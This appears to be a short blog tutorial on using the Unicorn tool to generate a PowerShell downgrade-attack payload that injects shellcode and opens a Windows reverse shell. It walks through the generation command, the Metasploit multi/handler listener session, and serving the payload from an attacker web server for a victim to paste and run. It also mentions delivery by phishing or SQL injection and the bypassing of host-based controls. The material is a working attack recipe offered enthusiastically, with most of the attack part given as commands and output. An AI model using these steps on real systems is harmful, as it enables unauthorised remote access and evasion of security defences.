Powershell Downgrade Attack using Unicorn

Dave Kennedy released a tool called Unicorn that is awesome. It is a tool that uses a powershell downgrade attack and injects shellcode straight into memory. It's based on Matthew Graeber's powershell attacks and the powershell bypass techniques presented by Dave Kennedy and Josh Kelly back at Defcon 18. It supports Metasploit, cobalt strike and your own shellcode. Again, it's awesome.

So, let's check out a simple PowerShell example that is a reverse shell back to a multi/handler using windows/shell/reverse_tcp:

Here's an example of how to use it:

We first pull down the tool from github:


Once downloaded, navigate to the folder.

Once in the folder, we can utilize a very simple windows reverse shell:

# PS Example: python unicorn.py windows/shell/reverse_tcp <IP> <Port>

python unicorn.py windows/shell/reverse_tcp 443

Once generated, 2 files will be created. A powershell_attack.txt file which is what will be delivered to the victim and ran. This powershell script can be run however way you are able to deliver the exploit, whether it be through sql injection, phishing or having access to a cmd on the victim. The other file is a unicorn.rc file. This will is used to create your listener via metasploit.

To begin, we run msfconsole and the unicorn.rc file:

geoda@kali:/opt/unicorn$ sudo msfconsole-r unicorn.rc
[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
resource (unicorn.rc)> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
resource (unicorn.rc)> set LHOST
resource (unicorn.rc)> set LPORT 443
LPORT => 443
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding=> true
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on
msf5 exploit(multi/handler) > 

With our multi/handler running. We now need to run the powershell script on the victim. For demonstration purposes, we will just host the file with python SimpleHTTPServer:

geoda@kali:/opt/unicorn$ python -m SimpleHTTPServer
Serving HTTP on port 8000 ...

Now, on the victim machine, we navigate to our attacker URL and click on the powershell_attack.txt file to bring up the powershell script:

At this point, we can simply copy this script, paste it into a cmd and run it. You'll see your multi/handler get a connection and you're now on the box:

This has successfully bypassed some host based controls too. What an awesome tool. Thanks Dave and TrustedSec!

Hope this has helped. Until next time.